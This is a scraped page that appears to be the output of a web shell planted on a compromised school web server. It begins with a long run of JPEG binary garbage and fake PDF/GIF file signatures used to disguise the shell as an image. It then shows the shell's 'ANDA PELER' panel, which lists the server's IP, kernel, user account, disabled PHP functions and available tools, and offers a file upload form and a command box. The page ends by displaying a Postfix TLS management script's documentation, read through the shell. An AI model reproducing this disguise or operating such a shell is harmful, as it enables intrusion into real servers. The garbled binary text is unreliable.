JFIF     "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777"H !1AQ"2aqB#R3b$Cr4Ss%Tt&c$!1AQ"a#2B ? }XuAo)8^ IƟ`vUp9jY0Ǧ w)E허2jU`SEKw5]kSno!]:?jc\غV7/9N+{t#8zd/޲3F/=ź3GNquV"/4:{z%ۣI'D@ %88^f}VV)S_2ed^Mx"͟?UC62Q%чmO͓ cq0rŖJ\Õ_Sݶ'|G.q޾D U]nP%EF>˲E"d&'f2s6H]4w IS˶4VbaQ+9]XtNx:M0JNxϙ⟟"{nr;|{%vo\z-wc,*|k}-m55o4W9ؓw߱Yzk .=/oϡȴ^9ҧʹamtQԬZ]4?egjrQ}+)MleE]MPEn!`IK2RUEwVIoͷcp;lśe7΄uN ;rПV8|e\׹9Y-V_G.)XԢOv<;_"ڜ]ߙEr݊'K{KuBJ}KI}24|"v)/ʻo5)6-Tjd7.C]Q&lU,Yk1P4~UKZs|$kX6+屷CUq+N(jlGrpG&UB3#k3\9qfg7O8Kim(AJOO~C#e`i0wĦij$cWh<dtQߺ"NOtG+ZǪ]b5%]v5$)u|qZ柡s-rۖu$MKڎCmN_V'/1u,21pvlc>қeNnֺ|bkl=lǷNOʣlz*]»vȎ[)j[fs[]:s#m6Qt6*Q+`};ßj[F_jcv`r#w}|k<ڞ/r53N8>Kh q_-_??@enſEܥ\D\YAEo+ ޟd}IcY7+t{=ɩ>}i\\JfxzVdSzᔢ]Q^CJի\iceitMM5hڦg')^ et#ۯ"ÿfF->4iؤ2ݷ6#p6^-R̫gETj^I.kӽUp~D9[:/>h> \gJ|ۿؘ>ml9jMK =+*2i=0RiͶۗV{"u]IH`9J_˹KƼK$X-|=ve/ bjxw.9i%NqVJcFYKcTtO,F;%67vYb8֝qq0tUt=DvawsS~~Edzr^F-v{c++ݔ\|9Iy #nOavOY=3690Tcrilwa\˓m$?箵S6U c(.~R7suMhqcMOnKoc*ȣȩEd'J ܜk*_q}%M/7c.|;trddbsdcJev85̤iW Ę 8C# .딖e$sk80^\J众2)Nm~|Idj_ O+6ǻ#(MIz4Qo:օY,:q]̌"lK}{F]ζ)h>ʶ ^ue78_G#rqv$wkk[Q c+վ+ĸZΝFB]VzoiJRke&Kgom_7Wef_7,osJɽE%lzBt>mRs)v8'P0ֲtrOg4p_2`GlhYڦDF/ӚKmtm'P2kqU765fJY:y؊.ox%8V_ִ̌ܞjpqwЮQ;iUcNoOoٸcY w*4soӵkqf$?-jy~0{>?DaL8XL/ɞo+'8 {ʸxգj#Dy)wk̘e۩+%}~;ڼ5xek|y-%ڱ-ʜe:EEScÚ5z|r'&I&яF*F7|[nRF =(4ۖ@. n7@xx:N^8Bg%u/ny6&dR{?8U_Q6Z߯-oh.NR]} qi6~H(j7*uF&l&o8ts]/P89:jW*$w׹Ӌ FxpsCJi.7N q4WU_}7*M#qWiصnk'4ݍl*t^ c<'d:~͗enFQRz9v~ddoTZ̚k7X(wUswO̙fոҁՕ[$IAI>WW~ĪEѢNoeutYߑ-Eixιpxq{FnyfRrjqU᫤]>wPU8)Y-7Wbq㛋w:7ܣ].j%K:y4] %9$I%pT(󨪙VqiYٓ4y~5S/XTDZM2lȪ; S~Kx:(Mn0';-{*qV&|W3S+\֔a{R{s=lYmN9Fn&o'}Vi( ?*qV5ѼCNsM饏zߴ$^O69@ ,$y|jE;gW/u|M?3+ZՕN86յw%|QO㏏S\E#ddsgl+Scl3~~CԕQľ?5_ z߿t11OĶ0>oB9E/SOSk+b&Yn>$툧eg) "!܉(1 uBoJ)/t/,:=7M+1ܺ#CmS^Nz 6[u&]+|Dfj:uZ5-Z^TjMtm>cȳ NdT_,M#Ex;pt۴ͮ#!N iKl!zPծ~$1SiO} HI&g Bf)b%Ko̧kumEnص;V?j>nltOMVۆl>.WueYaw2+qK,?uHiqqSM}~gu3xbcWSy/Xc{%sZ]uaUM;7:cb5G97'7þյW,;$ܛyVjl޻y7S;o6gf.Tг[7/i1Z^rE cUF'P1-?%u&q{fw~27ޡ ^w$?SwP[=R3Y73 4x(Kk&rLȫMKn:RjcI?3Al`vض[POĖSYujj6v+-[xҵ=~zNN>\ɲQ/uufo*e6l;31붏.>w6=7#7dFDc%ƶTbd;2/=?Asr! ~ZSS~I"9y]Hn,ĊJ7S}cK"amCg3yP=RQɤW}t;-{F+v+RɔڎB?º{SV묖kۏmK~%.Q;OfEf_Y/F-V-MdD)m.ZՍ8Y*h[g/6ydmCc[rdfʾ䖗gd$^֍^ʅѻL|<[݉\߯RiJUo';œN?B smS ܹkس,mRE^ѣlJ&.ċ԰YO:޼f\Z'HCѯU[ʩ1ff4S-٥YxTIGLiыr }L)edׂ*l|ٚuoxӿnWkTbbVm zT_'"x5Vިxo1ج^Fq6Sd3ws'/ڞ6m?}1OsRGݝ+,~ڬ%^p1ef5c25vq~﹉ă[r-eq] 8+/ESj}?mUE.xYK3"oƔ^Y9I]I ޑ" &*4.Jâ}ټQbXKJ񽼀ncg`+riܭ_'Bֽp%bX'7cB}WPm|zHָLJhj~E>i~Z$297|_hyΕ&s}ZϷ *j]:v.HK<SP8`Pƣ)r ,}8Wk[ArHgn=о7:J]TTP>OOj J_KyB\Ԥrm嬷ȫr{ݙ5R(FRЪ6q}KLmR'eޖz6[YތesYYL5Tr7s\^rؙV͸컬j5d?yk'b S }kra^ߚRH)[sg.fLM\u= vJQ]rVkZuoN}#G?yjO%|i2fKoӰღC P_Ϳ6Zr{e/m$i}9 G2')YG9KY>|1ӫ +v+i;h\Q@˿Lӭn˖ 7ck>Vr.D0)hC<˄4"0[eԬݭe+l2s3ss oX]1r]+VK vI;mZ')R6e5=/i@]H^Z۬՝EW.jƆf{8mXMV~_̝z^VR}T63}}k3+k3:j1Phlpi{欍BȽ}6w73GtUZv>4eUj$ xz$$D/߇ߟI"uk̜aƪ*ke/F:dһ_PE1ݡkp(5ʏ-ɮ{Yllԧg!ܝ g]i-umεŸxOê^=PR ##XeMy%2L~󜺶Hm ݙ2t_ƶz7'\Z4T<"AM-&xaC]a5.huQ۫$cMμ|h;.J.o߸sE-zU{d];|YLSMvSEneNKr1B[]NeonNߪ$4̘FPrkxޱ=0lr7Q%=$KQ;0r*XKdGۃ*]w-npᬶ\tt4>Dc[Ouo3/)-WҴ xs71eԤm*ٖ웗H''.Cnmy]݊Kra[9)Y#2U6d7tf.[R.GdE>#O_.+-K`{KonR_ÕM/)?:F,Xo1ƽRmz8C]lD %(x+d2Ah+\CCLJ!D65x\ȼv)\Nrp*[YُfL*PyVΚuWA K4hyYdwihNIy#ub?4NDϐ'4 :nFe(o%ve@@xl-k%QƭRP&kεMŪ-Ys2u ]T!}8*TQnZ}v =~mԧyDM&8K>2|Bnugܷ.wvCs̼5F^ubES7ݢM&4Ź-~mKx1((sr!M5uy\q)oy|a)ˣ,A?w"T휳2\F}PR-<2%`~4Z5\W"(USkGpT(~Qj>ɰ쏳ǓSKKx's]nEf'.iݙL>Moƹk7ݭ[.г6lk<;?)#E]xFU7'>vF%R;t:Җs}NSBWX=Y8ث}~G)S^^ƽwR[)/Fm-ڞTK~˓Z]U;RQ=M/"NԝP[-Y9t_8V+}P?Ue{M/O&WWKvc#r'KM'p[±vtpRC/W|7K2Rfm;ljm%Z]^T[6}6iTC }L[uxg7(Z}. SRI)jҞzȶ쳢oYRw$ŷ"J\ǭw{u'R taF{;3hHB\RP(*ZQ]y;;k٥nWbGKv-V?NDҞkd9@z LJ}Kc9C*?V-*[*۸-0.|󲝳ߗZK#%_OFGF$kC$[NNJ7Yn[k~Xzc+Sʲuhsw^^4+nElbƮKD,}YLV=i=|p|_=b5mȵ(~,em#Xƥ.sVoEaWXc.lY uG\m';'*\ӆ}|˯UfQBvo}/"zw + qvMrQ[[AdU2ٽCGgjؖS~Ev%9">$_2Sߚ%ѽ7jX(t#21r{̬F]b()?r[Rı)W[O/6]XL9 vuLh-Ȃ9"'7f!Փ䮿Bf}[lag֧]?Pc#D9EmfK7o*})+n!]qIo^FrNVNo!Eƃd#OP?%ۋ(mPu93ۣ{}2&$%cZ߯LҚY);U afԶd,*'6_?B:R~}^̬~mJ+vC}Ѩe"MY+mi :s쥸;iJeYvBddeK|#5/mzR]F2 JHUU )/S{Ic$=: W)>} @0#URsR=w"L{+ɞ)d|*qq2>[nƨDۋ-G[6½J|{Ѿ4MwyG-Σ Ze{ug>2|'zΤ2%xՑ*<Q̥T')uLkjn(zF-JOR}wn~FV5zq2m'^VS=7Y^RdfeO)>EpX붚w*r*w˿^kڴ{J;K۔sRŶU]p\zn@dx6[+yeH[_m_/I&mv|M5&&-G"v۴^{vg8Y(K_~h0e AxfrzڬkhS/Vy1ϯdW3'͹}{'V-:MW(V/ͷ*E7s\EmEW}bUr'k,P{9?B֫ #[uNrB,wo^{fdF(5tRf.2J-/:~ t0M"d_/c^32*q]yLl^2[ݥZc*vtm213r'tSuM-Խ#o/HF+2VEpmǦޟS?Rs+t:u G8n,Ԛf,hY8SX*rKf>+cpruɬ=DMrXgϸ:~ɲ ~]'5'kElw\=ڞAG&')G9R\_̝1K;nPg&T(ի[^Jҟ"qoӸ.W}3mF>'$<\U6-~?x?B~{^xkpv-vlߣe빹j\(ښsuu6lH(qoaYt?x8}Ie '@b%TݲygV.+O9/W4MsCMuFjYzG.{ds.k(>G~K?ni-=R r}r ?s̥%l5Ϛ9IN6~۩RĢWNʾE[|nb.HY—קWkr1ҺշMNDp)^¸R:w;u1 12]T/Uiʹd%2OC2K*r5S]g凫5 UQ.ȫ– /i91njFkQxuJ1rn%XDžy?s˗վuMGƋ/m^J*RsF))uF,'l{=|nFm9:N\%u#tnXE->e2Y0PũjUȨEŭ|'eʹ[o{Ցms%CGg/}t|snzrvm\g}cÊ94Pvg'L}ّg궮ԱߢO^f.W-sT]M˔ېе<^Н'KuNn_Vl8*Kж^ xsuW51-ᅱFzƉT-kY/9wzDޯ/XlW)gypǚjDɨ~{ݤHCim.[>rqE_Uرx/>|L64%aj;fxӱF(K֓J9՞ -K> I_5Enn´&=Oc%o̟IJZF$۲5I9Wݚ n.WTuѲӏ[4U/9.2zX5\j3ĎEsMq4%9.d[7јc9eNa+sjE';%s#ɤ`ףS=WI쫢.Mv:j/[3:rTF_zt:.z%udW%]xܮVz$Vŗ49[^y.խN~M&mx+wGR~_4KC[ʻ:v>03߶v9x-Mȧ$c:lrCWjeg%ֹ_Nh՝Qɏj^ϛr^.>WhlE5yֵ6\W^确]*гc&^NI[oCDn.ߑ!,m&M_/'Mn$s\r^8|uSZZ1|LV<(zq׮xmٚZƏ%.Ԁs^2𱸒O#&,s[mײ9kޖCoSq&俙qxP.N] 2UǎsM2iN.f r[mcQZmFُE{#[TbҔ*sfaSrn^8N<\_'MarJ6 EQғ|F[S'[~q~kmn[_x?B f5Q١X=g(~[Cx}GO ĺo'e)~dq(Ot`sN=~heu ::m'Cjj>~5V柙cyQD%uqEc{[l^U O]b~eŦۑ'W3&' 2V.^D%G S6\wYNO$. O+^ŵG~haEs^=1*bICzFF4O#,Wu3허ekB\I'tWMߩOG3iFz{rgeM9g r] i3gk&u1r/1kVgR-ɿuF .^;3;?3큦bN̂r4ovMkڞ}[:,IVG<};*-2",>K%bK2Ƨ[w!)ˤ;d?4%Ul2ږec4#ōIw^R_/TFX+*FM[F|a'ߚ2SIMeVGn ~&Y Ym(?ԛ],=|сG4yjk"Q^~ԗ^c,qqrg^-:Uc[E8>>k|nS..LBIc>3i|ZEZXAqm nuOm<; X~mrK=~ ƱrSN<U!F΋WS/|t?K)zd} ,C"ovx?bբs3mX3桭X֖˦kFddhg}$ggSo5jL*NdJis$ EQ\v=0HxzyW~FT_Ƶccg,&=_V(%kq+_÷O'[_[Uڽv F $Ξ9n5EN/4Yy/%*} .jΔ`V_6\VͲohzfOgޯzpj}y}v:34WH;+x7ӻu<ݦ"mJ/=>eoD֣c4kXW-[}٬6;t[Na_• _5i5˗sٴ]+e;Joj㼶ۙyLumo5&F)F\ {(sm_M>gzcr)KU̠Ħ=VDd'h;-aŤ9KٰqQܫަazMp4bk9 UX.ͮ]KeS5Uq[¹X0ɦ6]roFjʧ2׏6/C6eQE5KӰmsFnIz&`z팡-ٯ.ixyك?c2//z6M4W[]_"?Õ[? Vfvӳq]I5(d|MʝzcC*mN>B2gD+><e:Gh %UkW%zJ8k_ˠ=KFRfw{sŖ^q\/{v[Ω}gLjT[t_ޕg6G~rkkMcSRKբ54?SAûO1o%[>5/R~CioNdNʛćh>f6H8c/<1xd[ŦCEk.9"ej?w&O6^ژR[vrQ.z㎩f6:V8}hi2z~ s-w]+|I9s_C~>-S&9ZFVLf7-d'pՠplJ#mm؎s(?Ʋ?/A%_sXuGNnR}_dq>1ʍ|У3]NXYZʷ/&ܛ彖LS? 6]"_t5qP5Kq]^m91jW暹U6-5WU澦M0˵f2ӪǮ.P~? _nEJTcTei)ٳrۣ%x %gs}7l9'tb~dXst# r?}Weaq>=+to)7،E*vn\e_,\NFxcivz]tM˼?Oԝ2Zrλs-ĺEtonIIfm/9^[^EBUjOnr6vI& l]%0")2䒶-+R*zyX<> -X9GUo^xYQ8ιvixٔa\t)hv}ьոVU~tK,=_wLLa?TYIo]$`N6cbi?#7;MRt<.~Q-mob\\g5췍 ڌ_?8nfJN/Y͢n3?_sϩ{HiְPo'yS??_jߡWi5q? MWȲ)8a]lLˏ--b[TXlΫRy;o5뜾$HW.mm?շG[Ƀ seo5Q}Le%*،«~uU{R$t\^%!weX:G('6WupTS&~8=jo?2_PϖE[nf6Tٯ;GLW)NM[o*\j%.gb|䭹noOX:1R)UTj74˓]D_bʝkzNI.9|^G`KeQ{mOjX/sR7evdgi7qm}ތW&4=~|YY)?7Oj}xXkF×4c.l?i|b[5Ή5j-[Y\z<茲Z$Ff&o;gErǩݦ̪/q[&[/9uuzi;PS^_/?]=ΕqK~ӛ5'NM[m_Ϲc'[oӯE#g߂vvGNRo϶o5Ǩ[ɉtov2~i<7iSȜN(G5+/ٛMTܣukj鷣/$1˒!Mxr\ߤs1ZuMQȌ^]c$CXrj#N/˦Ķ9]Nzê5zi;W,v!ŧD6zğ7uR5^MW}>igl2U2nXo{}_w]&vte\Z3 MEEe/ 2s㗼S_bIղTI}|[Ye/c]*̪9u/DmyNxSDgi `Z?.RFj۪'~.[KVb޺o濡to?E#[.^y=q4F8ڎ/GX\.YW!Z.ѕtt:?gYYyU%Uw~ri>ȦKhg,5/=>V?TrN4aWO,oӕ7-SRi*"dܽpuaVQÞd-#J2Nr:#``ѧWR-F?I-T -cOT2pr?þזgE\Ij~L9%EMoџUؙt8_eYΧWjU}e9y9z/#TT-2dLt3H=ڼcKb'"uIٓ'[[߱F~\2]r%C]^VCLjm[cJNryf}ջ.[DEoRՒb'>fVy_c6[K4Na5>{ɳaw/Uj.Զ_K~?IeJ7OQx3IgFc*جɊǽ-o3Ӭp / ]7V*ENܜ[r/tOJΉw*ʨ*JFN^.WZeLgUwKi/M9y8dkOᛊHxGĶM*&#h/U|6D(uFyE5hYxiSEVm^D|,ۿCj;<*ouOkYpΔ2{x-L] !k2ا#IM'a7:M}M1Y儭Mnk[/;4Uwkkɫ%aɔoXVV$m;2Z4i9:>\Yů= ?[{t6,~!c`Un+dW.gKyIB]l+3kض(\MZ\}>k\C~閹l[ů]VNtƸr몮X+U>v'nv{y7s[г̭9Ctvt% GqT8=wa(6\Rd柮YWv^Fd^\+緉,+=-^S"k:NVu o[_TIѝ椯bF/G㿏dΙ?T}K-T)W>s?3M)V*,;P\,}B u{rDexڥVFfw}47׋w}]Դ 1dmk1V%/'T:Fǒ_TEe[l/l/ٯc{Ƀ[~`zj⾥r}Vܪ{M8Qv]$mU]8J2MngcxY?鑞.9HjxSy.fS(|]MgcK2$(jRQ3XO|<f:Jq4& fw|$N )A8ת99 mFNM*Dϒ NoIa9i9y?:D⻧߇\7ɧ]mu"-˥5/w̨_ 7DK['[2"(%xzT\*GT"+<,yX.lEJrfo?.4N;l>jmZߣ5FdB3\r,t,./S]Q{tm5lӕT~A [fv7Iہc: ΪN7I]2(|o$NLW"#~Dͭ=v-Mv{-lqn{I3xn'6.=DƟܖަ~deQV;k2Ei\[bӴ1_]OhZl朠&t3xkei+c\'ZԪ'hK梿X@cTԫ#emIz6e^i?8 NBc̆f+MׇdC]YSd%lώ8-c7eι/}_con/no\핍~[WNReXMo+اn ?#Ͷ-AUFN1V4!y,{1a$S﹑;Ǚr"__[o) xk}7EI/riwؙ7mR}`|yrEVdo/B# uٳiNQKQkᑑ^d@/=ˑɒ768fsuor9=7ףܹճpMr-$1uySOZN?đrqզ9F q=.!T?ػ bf{¯q=$^:!ES߿ Fu\OS,8e^UוS^hF4BQƺȪw-kF39@X06 Fv=Q^|ƞ5}2tnmG_|Λ(|%](-5>KȁN$=6lq).12 V6m$ׇlOcҫܸ K{;ľ>+Q?Rx-Keu uMy$i B}G*h$Q -W[-&a"[i\}~Ek$<~c{MffS eS.#\^lMiytު]9S{u4 {DFޅSź}R ]R$y;r/P̙3niXMt;&!rxw\ZFmQ"w\L{^۔K&/gr:m=2%5bwE"^e[\$ɟPi!U_rdS2d?=[!(I.rC QZEim%}|YmzZ_ά<ۡLQM|` ybPȏ}?]Eu[`kҫgFb~F}Q8NP>5lӳ^-K%Q}$sx7SvnfTƸ|Kzd'_ⰽח$4L Y?qy32t j2e ȜrJ{mبhۍUU'p#8y'ѝ=i+Tĩo7WYyČkL5؝M=%"Nt}eXW)N.~sv5pɮ sSQ[+-/}kVk'FEɩ9SE&T=&\緵 --tf.9Ѳ4_##_ɱTFV؞~YTddS&s=䟚Fb1._5}~gM'p#,U hs--XG wtԹTi7M:GYK5'^W?C>_Gq/S&d| k_gO ӊiJeHU G_ Êg#),}-:5>V1emq}t}q?meKU:BqJeiPɗ#\$sI} Z生ƫoo=V=pVcUg"%wEm叡vIdhrȔ~F]p58_.,O|'Ɇ^L!c6OWӷ{x9?Fp?ceOuT+Uɵݹ&gx9i퓃sxGIm}_3Īr#:ԣ?4בc[jö#B7KʌWNo)=+c }YvP{lv^r+5Vxx_:~=̌Q}CTy+Wh鸚f$101뢊F[#--Y\i@l)W8/E>8nlj/ktOľ,q*[sE[]:?ZeQvŔɺ|j(Wx,LW=:S?κq%81c)jJvODLiW,{96vr-2}-EH,}%3k#l5gl~x__W Sڎ 8YJQvA=QIWju6-X9$kWЩCI4UWd'&O/Cf=Pi/#+>n$KYst܅y4ʷD^~%~myj,s_4Q}΍Cή;SW:h=Ff{.B/inȇo=-T͸OY2}hlK}.m7-z?,f-/^b\QWs/_͔/3In[6M;l ygؼ!WUË_)D9YL4_>f}ϵ3hV5Oѣ(l8?L4蹥[-Э=7V{&ʢPʼ*3cMz>u4@[oM gKS[jy"Lھzɵfx)GE`ֿ.=kJ>/iˢ[j-qץQC B@o V(ʯG?Bܻ\I>=K-].(vOE.5׮=/Pf^&$caY9{3މ%YOxZ~6Z;;ԗ.NJzş/YϖĜ%ѿO^tY$ν4|e}2ɶU9A؜h˺LrIm%J.|I]kG|DzU k4'(T\9߱^!z -:mW^ <= <^2*;Seq(6ªsHf5ʸO{Ilr~G uJY^k5X_y;5'59O@ƣ̶>pnCOvNwX4oUUf]Џe%MV9Xm9]x'Q=82z)c/~1\~LSow>ﺍƻUql~Sqo羘sk}VjG71kYؽ]b4qnMӡ; w@̇IL㿗[43)]=v*)EH'a񖳋ҎTkxuXGK& ZIR(M8?:ixJp-dmckpu*%N^-7E3='ceE&';_J'Mw𶥏Y9+d9+>!e_Sn|VX -TZu]Ģ/6\ckr /ޗ/z[y.N:*k$ }Yǭ}GUm^-%dm;K_#ctBsg2:8rz-VE|T w.}w9NEPGnoCe8/&3qT}MJ̙Mۗ~哳,-WI_Bsh+~͛vN{ZdYKݲkr%+lo*re-ه?:vYqFfCsqMXRķ{yqgrx.oǓ\xdڗ_ZC9WomX|KmV_%UJܷr$drȳL~MoKyYLic Jq<1$UuٯTד374s<ĕ96춉r9 pGc9=p^:)ZJb&VӝXٽ 0/X& ۳*_ԙƏ.5J 6<$$6B0d_d?hqd>XCe- wO@pg:.>$.Ϣ~L޲|,{-ɪ2.u/Ds-[ُiVIWK5M#Fܭ3?x.)ۣ,wJ)Ȳڣ-#fbdq&Tͧ8Q,YqQ)/R­?\k˔[p_+ogzP[6r^o}_kT}JiJ;<ivEH8wI@MOPʊ\#+$%PDF-1.7 GIF89;
ANDA PELER
Server IP : 182.253.108.180  /  Your IP : 3.143.1.37
Web Server : Apache
System : Linux sma1wiradesa.sch.id 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : wijaya ( 1017)
PHP Version : 7.3.33-10+ubuntu18.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/postfix/sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /usr/lib/postfix/sbin/postfix-tls-script
#!/bin/sh

#++
# NAME
#	postfix-tls 1
# SUMMARY
#	Postfix TLS management
# SYNOPSIS
#	\fBpostfix tls\fR \fIsubcommand\fR
# DESCRIPTION
#	The "\fBpostfix tls \fIsubcommand\fR" feature enables
#	opportunistic TLS in the Postfix SMTP client or server, and
#	manages Postfix SMTP server private keys and certificates.
#
#	The following subcommands are available:
# .IP "\fBenable-client\fR [\fB-r \fIrandsource\fR]"
#	Enable opportunistic TLS in the Postfix SMTP client, if all
#	SMTP client TLS settings are at their default values.
#	Otherwise, suggest parameter settings without making any
#	changes.
# .sp
#	Specify \fIrandsource\fR to update the value of the
#	\fBtls_random_source\fR configuration parameter (typically,
#	/dev/urandom).  Prepend \fBdev:\fR to device paths or
#	\fBegd:\fR to EGD socket paths.
# .sp
#	See also the \fBall-default-client\fR subcommand.
# .IP "\fBenable-server\fR [\fB-r \fIrandsource\fR] [\fB-a \fIalgorithm\fR] [\fB-b \fIbits\fR] [\fIhostname\fB...\fR]"
#	Create a new private key and self-signed server certificate
#	and enable opportunistic TLS in the Postfix SMTP server,
#	if all SMTP server TLS settings are at their default values.
#	Otherwise, suggest parameter settings without making any
#	changes.
# .sp
#	The \fIrandsource\fR parameter is as with \fBenable-client\fR
#	above, and the remaining options are as with \fBnew-server-key\fR
#	below.
# .sp
#	See also the \fBall-default-server\fR subcommand.
# .IP "\fBnew-server-key\fR [\fB-a \fIalgorithm\fR] [\fB-b \fIbits\fR] [\fIhostname\fB...\fR]"
#	Create a new private key and self-signed server certificate,
#	but do not deploy them. Log and display commands to deploy
#	the new key and corresponding certificate.  Also log and
#	display commands to output a corresponding CSR or TLSA
#	records which may be needed to obtain a CA certificate or
#	to update DNS before the new key can be deployed.
# .sp
#	The \fIalgorithm\fR defaults to \fBrsa\fR, and \fIbits\fR
#	defaults to 2048.  If you choose the \fBecdsa\fR  \fIalgorithm\fR
#	then \fIbits\fR will be an EC curve name (by default
#	\fBsecp256r1\fR, also known as prime256v1).  Curves other
#	than \fBsecp256r1\fR, \fBsecp384r1\fR or \fBsecp521r1\fR
#	are unlikely to be widely interoperable.  When generating
#	EC keys, use one of these three.  DSA keys are obsolete and
#	are not supported.
# .sp
#	Note: ECDSA support requires OpenSSL 1.0.0 or later and may
#	not be available on your system.  Not all client systems
#	will support ECDSA, so you'll generally want to deploy both
#	RSA and ECDSA certificates to make use of ECDSA with
#	compatible clients and RSA with the rest. If you want to
#	deploy certificate chains with intermediate CAs for both
#	RSA and ECDSA, you'll want at least OpenSSL 1.0.2, as earlier
#	versions may not handle multiple chain files correctly.
# .sp
#	The first \fIhostname\fR argument will be the \fBCommonName\fR
#	of both the subject and issuer of the self-signed certificate.
#	It, and any additional \fIhostname\fR arguments, will also
#	be listed as DNS alternative names in the certificate.  If
#	no \fIhostname\fR is provided the value of the \fBmyhostname\fR
#	main.cf parameter will be used.
# .sp
#	For RSA, the generated private key and certificate files
#	are named \fBkey-\fIyyyymmdd-hhmmss\fB.pem\fR and
#	\fBcert-\fIyyyymmdd-hhmmss\fB.pem\fR, where \fIyyyymmdd\fR
#	is the calendar date and \fIhhmmss\fR is the time of day
#	in UTC.  For ECDSA, the file names start with \fBeckey-\fR
#	and \fBeccert-\fR instead of \fBkey-\fR and \fBcert-\fR
#	respectively.
# .sp
#	Before deploying the new key and certificate with DANE,
#	update the DNS with new DANE TLSA records, then wait for
#	secondary nameservers to update and then for stale records
#	in remote DNS caches to expire.
# .sp
#	Before deploying a new CA certificate make sure to include
#	all the required intermediate issuing CA certificates in
#	the certificate chain file.  The server certificate must
#	be the first certificate in the chain file.  Overwrite and
#	deploy the file with the original self-signed certificate
#	that was generated together with the key.
# .IP "\fBnew-server-cert\fR [\fB-a \fIalgorithm\fR] [\fB-b \fIbits\fR] [\fIhostname\fB...\fR]"
#	This is just like \fBnew-server-key\fR except that, rather
#	than generating a new private key, any currently deployed
#	private key is copied to the new key file.  Thus if you're
#	publishing DANE TLSA "3 1 1" or "3 1 2" records, there is
#	no need to update DNS records.  The \fIalgorithm\fR and
#	\fIbits\fR arguments are used only if no key of the same
#	algorithm is already configured.
# .sp
#	This command is rarely needed, because the self-signed
#	certificates generated have a 100-year nominal expiration
#	time.  The underlying public key algorithms may well be
#	obsoleted by quantum computers long before then.
# .sp
#	The most plausible reason for using this command is when
#	the system hostname changes, and you'd like the name in the
#	certificate to match the new hostname (not required for
#	DANE "3 1 1", but some needlessly picky non-DANE opportunistic
#	TLS clients may log warnings or even refuse to communicate).
# .IP "\fBdeploy-server-cert \fIcertfile\fB \fIkeyfile\fR"
#	This subcommand deploys the certificates in \fIcertfile\fR
#	and private key in \fIkeyfile\fR (which are typically
#	generated by the commands above, which will also log and
#	display the full command needed to deploy the generated key
#	and certificate).  After the new certificate and key are
#	deployed any obsolete keys and certificates may be removed
#	by hand.   The \fIkeyfile\fR and \fIcertfile\fR filenames
#	may be relative to the Postfix configuration directory.
# .IP "\fBoutput-server-csr\fR [\fB-k \fIkeyfile\fR] [\fIhostname\fB...\fR]"
#	Write to stdout a certificate signing request (CSR) for the
#	specified \fIkeyfile\fR.
# .sp
#	Instead of an absolute pathname or a pathname relative to
#	$config_directory, \fIkeyfile\fR may specify one of the
#	supported key algorithm names (see "\fBpostconf -T
#	public-key-algorithms\fR"). In that case, the corresponding
#	setting from main.cf is used to locate the \fIkeyfile\fR.
#	The default \fIkeyfile\fR value is \fBrsa\fR.
# .sp
#	Zero or more \fIhostname\fR values can be specified.  The
#	default \fIhostname\fR is the value of \fBmyhostname\fR
#	main.cf parameter.
# .IP "\fBoutput-server-tlsa\fR [\fB-h \fIhostname\fR] [\fIkeyfile\fB...\fR]"
#	Write to stdout a DANE TLSA RRset suitable for a port 25
#	SMTP server on host \fIhostname\fR with keys from any of
#	the specified \fIkeyfile\fR values.  The default \fIhostname\fR
#	is the value of the \fBmyhostname\fR main.cf parameter.
# .sp
#	Instead of absolute pathnames or pathnames relative to
#	$config_directory, the \fIkeyfile\fR list may specify
#	names of supported public key algorithms (see "\fBpostconf
#	-T public-key-algorithms\fR").  In that case, the actual
#	\fIkeyfile\fR list uses the values of the corresponding
#	Postfix server TLS key file parameters.  If a parameter
#	value is empty or equal to \fBnone\fR, then no TLSA record
#	is output for that algorithm.
# .sp
#	The default \fIkeyfile\fR list consists of the two supported
#	algorithms \fBrsa\fR and \fBecdsa\fR.
# AUXILIARY COMMANDS
# .IP "\fBall-default-client\fR"
#	Exit with status 0 (success) if all SMTP client TLS settings are
#	at their default values.  Otherwise, exit with a non-zero status.
#	This is typically used as follows:
# .sp
#	\fBpostfix tls all-default-client &&
#		postfix tls enable-client\fR
# .IP "\fBall-default-server\fR"
#	Exit with status 0 (success) if all SMTP server TLS settings are
#	at their default values.  Otherwise, exit with a non-zero status.
#	This is typically used as follows:
# .sp
#	\fBpostfix tls all-default-server &&
#		postfix tls enable-server\fR
# CONFIGURATION PARAMETERS
# .ad 
# .fi
#	The "\fBpostfix tls \fIsubcommand\fR" feature reads
#	or updates the following configuration parameters.
# .IP "\fBcommand_directory (see 'postconf -d' output)\fR"
#	The location of all postfix administrative commands.
# .IP "\fBconfig_directory (see 'postconf -d' output)\fR"
#	The default location of the Postfix main.cf and master.cf
#	configuration files.
# .IP "\fBopenssl_path (openssl)\fR"
#	The location of the OpenSSL command line program \fBopenssl\fR(1).
# .IP "\fBsmtp_tls_loglevel (0)\fR"
#	Enable additional Postfix SMTP client logging of TLS activity.
# .IP "\fBsmtp_tls_security_level (empty)\fR"
#	The default SMTP TLS security level for the Postfix SMTP client;
#	when a non-empty value is specified, this overrides the obsolete
#	parameters smtp_use_tls, smtp_enforce_tls, and smtp_tls_enforce_peername.
# .IP "\fBsmtp_tls_session_cache_database (empty)\fR"
#	Name of the file containing the optional Postfix SMTP client
#	TLS session cache.
# .IP "\fBsmtpd_tls_cert_file (empty)\fR"
#	File with the Postfix SMTP server RSA certificate in PEM format.
# .IP "\fBsmtpd_tls_eccert_file (empty)\fR"
#	File with the Postfix SMTP server ECDSA certificate in PEM format.
# .IP "\fBsmtpd_tls_eckey_file ($smtpd_tls_eccert_file)\fR"
#	File with the Postfix SMTP server ECDSA private key in PEM format.
